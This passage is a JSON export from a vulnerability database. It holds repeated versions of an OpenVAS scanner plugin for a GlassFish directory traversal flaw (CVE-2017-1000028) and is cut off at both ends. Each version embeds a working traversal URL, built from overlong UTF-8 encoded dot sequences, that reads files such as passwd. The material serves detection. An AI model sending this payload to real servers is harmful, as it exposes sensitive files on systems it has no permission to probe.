["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"], "type": "metasploit"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310806848", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_oracle_glass_fish_dir_trav_vuln.nasl 11702 2018-10-01 07:31:38Z asteins $\n#\n# Oracle Glass Fish Server Directory Traversal Vulnerability\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is 
distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:glassfish_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806848\");\n script_version(\"$Revision: 11702 $\");\n script_cve_id(\"CVE-2017-1000028\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 09:31:38 +0200 (Mon, 01 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-27 14:43:03 +0530 (Wed, 27 Jan 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Oracle Glass Fish Server Directory Traversal Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Glass fish server\n and is prone to directory traversal vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted request via HTTP GET and\n check whether it is able to get the content of passwd file.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to\n\n - Improper sanitization of parameter 'META-INF' in 'theme.php' file.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to sensitive information.\");\n\n script_tag(name:\"affected\", value:\"Oracle Glassfish Server version 4.1.1\n and probably prior.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the\ndisclosure of this vulnerability. 
Likely none will be provided anymore. General solution options are to upgrade to\na newer release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/39241\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"GlassFish_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"GlassFish/installed\");\n script_require_ports(\"Services/www\", 4848, 8080, 8181);\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!http_port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nfiles = traversal_files();\n\nforeach file (keys(files))\n{\n url = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae'+\n '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%'+\n 'c0%ae%c0%ae/'+ files[file];\n\n if (http_vuln_check(port:http_port, url:url, pattern:file, check_header: TRUE)) {\n report = report_vuln_url( port:http_port, url:url );\n security_message(port:http_port, data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "naslFamily": "Web application abuses"}, "differentElements": ["cvss"], "edition": 9, "lastseen": "2018-10-02T14:29:56"}, {"bulletin": {"id": "OPENVAS:1361412562310806848", "hash": "a7cf2277676e5012de0f8c8d838e13144d7b46dbfcd2ca7d814d6d0a8dc326d7", "type": "openvas", "bulletinFamily": "scanner", "title": "Oracle Glass Fish Server Directory Traversal Vulnerability", "description": "This host is installed with Glass fish server\n and is prone to directory traversal vulnerability.", "published": "2016-01-27T00:00:00", "modified": "2018-05-23T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310806848", "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "references": ["https://www.exploit-db.com/exploits/39241"], "cvelist": ["CVE-2017-1000028"], "lastseen": "2018-08-30T19:21:37", "history": [], "viewCount": 16, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310806848", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_oracle_glass_fish_dir_trav_vuln.nasl 9927 2018-05-23 04:13:59Z ckuersteiner $\n#\n# Oracle Glass Fish Server Directory Traversal Vulnerability\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:glassfish_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806848\");\n script_version(\"$Revision: 9927 $\");\n script_cve_id(\"CVE-2017-1000028\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-05-23 06:13:59 +0200 (Wed, 23 May 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-27 14:43:03 +0530 (Wed, 27 Jan 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Oracle Glass Fish Server Directory Traversal Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Glass fish server\n and is prone to directory traversal vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted request via HTTP GET and\n check whether it is able to get the content of passwd file.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to\n - Improper sanitization of parameter 'META-INF' in 'theme.php' file.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to sensitive information.\n\n Impact Level: System/Application\");\n\n script_tag(name:\"affected\", value:\"Oracle Glassfish Server version 4.1.1\n and probably prior.\");\n\n script_tag(name:\"solution\" , value:\"No known solution was made available for at least one year since the\ndisclosure of this vulnerability. Likely none will be provided anymore. 
General solution options are to upgrade to\na newer release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_xref(name:\"URL\" , value:\"https://www.exploit-db.com/exploits/39241\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"GlassFish_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"GlassFish/installed\");\n script_require_ports(\"Services/www\", 4848, 8080, 8181);\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!http_port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nfiles = traversal_files();\n\nforeach file (keys(files))\n{\n url = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae'+\n '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%'+\n 'c0%ae%c0%ae/'+ files[file];\n\n if (http_vuln_check(port:http_port, url:url, pattern:file, check_header: TRUE)) {\n report = report_vuln_url( port:http_port, url:url );\n security_message(port:http_port, data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "naslFamily": "Web application abuses"}, "differentElements": ["cvss"], "edition": 7, "lastseen": "2018-08-30T19:21:37"}, {"bulletin": {"id": "OPENVAS:1361412562310806848", "hash": "1db041288c6f983b45b22173e54db20a40a5ad10bab4c0c0cfcc82e8a495c496", "type": "openvas", "bulletinFamily": "scanner", "title": "Oracle Glass Fish Server Directory Traversal Vulnerability", "description": "This host is installed with Glass fish server\n and is prone to directory traversal vulnerability.", "published": "2016-01-27T00:00:00", "modified": "2018-05-23T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310806848", "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "references": ["https://www.exploit-db.com/exploits/39241"], "cvelist": ["CVE-2017-1000028"], "lastseen": "2018-05-23T14:48:39", "history": [], "viewCount": 16, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310806848", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_oracle_glass_fish_dir_trav_vuln.nasl 9927 2018-05-23 04:13:59Z ckuersteiner $\n#\n# Oracle Glass Fish Server Directory Traversal Vulnerability\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:glassfish_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806848\");\n script_version(\"$Revision: 9927 $\");\n script_cve_id(\"CVE-2017-1000028\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-05-23 06:13:59 +0200 (Wed, 23 May 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-27 14:43:03 +0530 (Wed, 27 Jan 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Oracle Glass Fish Server Directory Traversal Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Glass fish server\n and is prone to directory traversal vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted request via HTTP GET and\n check whether it is able to get the content of passwd file.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to\n - Improper sanitization of parameter 'META-INF' in 'theme.php' file.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to sensitive information.\n\n Impact Level: System/Application\");\n\n script_tag(name:\"affected\", value:\"Oracle Glassfish Server version 4.1.1\n and probably prior.\");\n\n script_tag(name:\"solution\" , value:\"No known solution was made available for at least one year since the\ndisclosure of this vulnerability. Likely none will be provided anymore. 
General solution options are to upgrade to\na newer release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_xref(name:\"URL\" , value:\"https://www.exploit-db.com/exploits/39241\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"GlassFish_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"GlassFish/installed\");\n script_require_ports(\"Services/www\", 4848, 8080, 8181);\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!http_port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nfiles = traversal_files();\n\nforeach file (keys(files))\n{\n url = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae'+\n '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%'+\n 'c0%ae%c0%ae/'+ files[file];\n\n if (http_vuln_check(port:http_port, url:url, pattern:file, check_header: TRUE)) {\n report = report_vuln_url( port:http_port, url:url );\n security_message(port:http_port, data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "naslFamily": "Web application abuses"}, "differentElements": ["cvss"], "edition": 6, "lastseen": "2018-05-23T14:48:39"}, {"bulletin": {"id": "OPENVAS:1361412562310806848", "hash": "d089911724fdacc8b04df348343fb5cfe8314f608db90228e9e915ececdfd415", "type": "openvas", "bulletinFamily": "scanner", "title": "Oracle Glass Fish Server Directory Traversal Vulnerability", "description": "This host is installed with Glass fish server\n and is prone to directory traversal vulnerability.", "published": "2016-01-27T00:00:00", "modified": "2020-05-11T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806848", "reporter": 
"Copyright (C) 2016 Greenbone Networks GmbH", "references": ["https://www.exploit-db.com/exploits/39241"], "cvelist": ["CVE-2017-1000028"], "lastseen": "2020-05-11T21:22:01", "history": [], "viewCount": 156, "enchantments": {"dependencies": {"modified": "2020-05-11T21:22:01", "references": [{"idList": ["EDB-ID:45198", "EDB-ID:45196", "EDB-ID:39241"], "type": "exploitdb"}, {"idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"], "type": "nessus"}, {"idList": ["PACKETSTORM:148892"], "type": "packetstorm"}, {"idList": ["CVE-2017-1000028"], "type": "cve"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"], "type": "metasploit"}], "rev": 2}, "score": {"modified": "2020-05-11T21:22:01", "rev": 2, "value": 6.2, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310806848", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle Glass Fish Server Directory Traversal Vulnerability\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:glassfish_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806848\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2017-1000028\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-05-11 12:46:33 +0000 (Mon, 11 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-01-27 14:43:03 +0530 (Wed, 27 Jan 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Oracle Glass Fish Server Directory Traversal Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Glass fish server\n and is prone to directory traversal vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted request via HTTP GET and\n check whether it is able to get the content of passwd file.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to\n\n - Improper sanitization of parameter 'META-INF' in 'theme.php' file.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to sensitive information.\");\n\n script_tag(name:\"affected\", value:\"Oracle Glassfish Server version 4.1.1\n and probably prior.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the\ndisclosure of this vulnerability. Likely none will be provided anymore. 
General solution options are to upgrade to\na newer release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/39241\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"GlassFish_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"GlassFish/installed\");\n script_require_ports(\"Services/www\", 4848, 8080, 8181);\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!http_port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nfiles = traversal_files();\n\nforeach file (keys(files))\n{\n url = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae'+\n '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%'+\n 'c0%ae%c0%ae/'+ files[file];\n\n if (http_vuln_check(port:http_port, url:url, pattern:file, check_header: TRUE)) {\n report = http_report_vuln_url( port:http_port, url:url );\n security_message(port:http_port, data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "naslFamily": "Web application abuses"}, "differentElements": ["modified", "sourceData"], "edition": 11, "lastseen": "2020-05-11T21:22:01"}, {"bulletin": {"id": "OPENVAS:1361412562310806848", "hash": "d5e1001115ef972c9e3a47e9917cb434c2657cf294c851de10e2ec0e3b31759d", "type": "openvas", "bulletinFamily": "scanner", "title": "Oracle Glass Fish Server Directory Traversal Vulnerability", "description": "This host is installed with Glass fish server\n and is prone to directory traversal vulnerability.", "published": "2016-01-27T00:00:00", "modified": "2018-10-01T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310806848", "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "references": ["https://www.exploit-db.com/exploits/39241"], "cvelist": ["CVE-2017-1000028"], "lastseen": "2019-05-29T18:35:51", "history": [], "viewCount": 156, "enchantments": {"dependencies": {"modified": "2019-05-29T18:35:51", "references": [{"idList": ["EDB-ID:45198", "EDB-ID:45196", "EDB-ID:39241"], "type": "exploitdb"}, {"idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"], "type": "nessus"}, {"idList": ["PACKETSTORM:148892"], "type": "packetstorm"}, {"idList": ["CVE-2017-1000028"], "type": "cve"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"], "type": "metasploit"}], "rev": 2}, "score": {"modified": "2019-05-29T18:35:51", "rev": 2, "value": 6.2, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310806848", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_oracle_glass_fish_dir_trav_vuln.nasl 11702 2018-10-01 07:31:38Z asteins $\n#\n# Oracle Glass Fish Server Directory Traversal Vulnerability\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:glassfish_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806848\");\n script_version(\"$Revision: 11702 $\");\n script_cve_id(\"CVE-2017-1000028\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 09:31:38 +0200 (Mon, 01 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-27 14:43:03 +0530 (Wed, 27 Jan 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Oracle Glass Fish Server Directory Traversal Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Glass fish server\n and is prone to directory traversal vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted request via HTTP GET and\n check whether it is able to get the content of passwd file.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to\n\n - Improper sanitization of parameter 'META-INF' in 'theme.php' file.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to sensitive information.\");\n\n script_tag(name:\"affected\", value:\"Oracle Glassfish Server version 4.1.1\n and probably prior.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the\ndisclosure of this vulnerability. Likely none will be provided anymore. 
General solution options are to upgrade to\na newer release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/39241\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"GlassFish_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"GlassFish/installed\");\n script_require_ports(\"Services/www\", 4848, 8080, 8181);\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!http_port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nfiles = traversal_files();\n\nforeach file (keys(files))\n{\n url = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae'+\n '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%'+\n 'c0%ae%c0%ae/'+ files[file];\n\n if (http_vuln_check(port:http_port, url:url, pattern:file, check_header: TRUE)) {\n report = report_vuln_url( port:http_port, url:url );\n security_message(port:http_port, data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "naslFamily": "Web application abuses"}, "differentElements": ["modified", "sourceData"], "edition": 10, "lastseen": "2019-05-29T18:35:51"}], "viewCount": 255, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-1000028"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-1000028"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148892"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"]}, {"type": "exploitdb", "idList": ["EDB-ID:45198", "EDB-ID:39241", "EDB-ID:45196"]}, {"type": "nessus", "idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"]}], "modified": "2020-05-12T17:23:31", "rev": 2}, "score": {"value": 6.2, "vector": 
"NONE", "modified": "2020-05-12T17:23:31", "rev": 2}}, "objectVersion": "1.5", "pluginID": "1361412562310806848", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle Glass Fish Server Directory Traversal Vulnerability\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:glassfish_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806848\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2017-1000028\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-01-27 14:43:03 +0530 (Wed, 27 Jan 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Oracle Glass Fish Server Directory Traversal Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Glass fish server\n and is prone to directory traversal 
vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted request via HTTP GET and\n check whether it is able to get the content of passwd file.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to\n\n - Improper sanitization of parameter 'META-INF' in 'theme.php' file.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to sensitive information.\");\n\n script_tag(name:\"affected\", value:\"Oracle Glassfish Server version 4.1.1\n and probably prior.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the\ndisclosure of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to\na newer release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/39241\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"GlassFish_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"GlassFish/installed\");\n script_require_ports(\"Services/www\", 4848, 8080, 8181);\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!http_port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nfiles = traversal_files();\n\nforeach file (keys(files))\n{\n url = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae'+\n '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%'+\n 'c0%ae%c0%ae/'+ files[file];\n\n if (http_vuln_check(port:http_port, url:url, pattern:file, check_header: TRUE)) {\n report = http_report_vuln_url( port:http_port, url:url );\n security_message(port:http_port, 
data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "naslFamily": "Web application abuses", "_object_type": "robots.models.openvas.OpenVASBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.openvas.OpenVASBulletin"], "immutableFields": []}], "nessus": [{"id": "GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL", "hash": "b1cde8146408d8fec4f61d01851443de", "type": "nessus", "bulletinFamily": "scanner", "title": "Oracle GlassFish Server Path Traversal", "description": "The instance of Oracle GlassFish Server running on the remote host is affected by an authenticated and unauthenticated path traversal vulnerability. Remote attacker can exploit this issue, via a specially crafted HTTP request, to access arbitrary files on the remote host.", "published": "2018-05-30T00:00:00", "modified": "2018-06-14T00:00:00", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {}, "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "href": "https://www.tenable.com/plugins/nessus/110192", "reporter": "This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?159578ad", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000028"], "cvelist": ["CVE-2017-1000028"], "immutableFields": [], "lastseen": "2021-08-19T12:32:04", "history": [{"bulletin": {"id": "GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL", "hash": "d1762c95c0c11952ea82e316da20191d974cbe7550478cb9c407923c8e625274", "type": "nessus", "bulletinFamily": "scanner", "title": "Oracle GlassFish Server Path Traversal", "description": "The instance of Oracle GlassFish 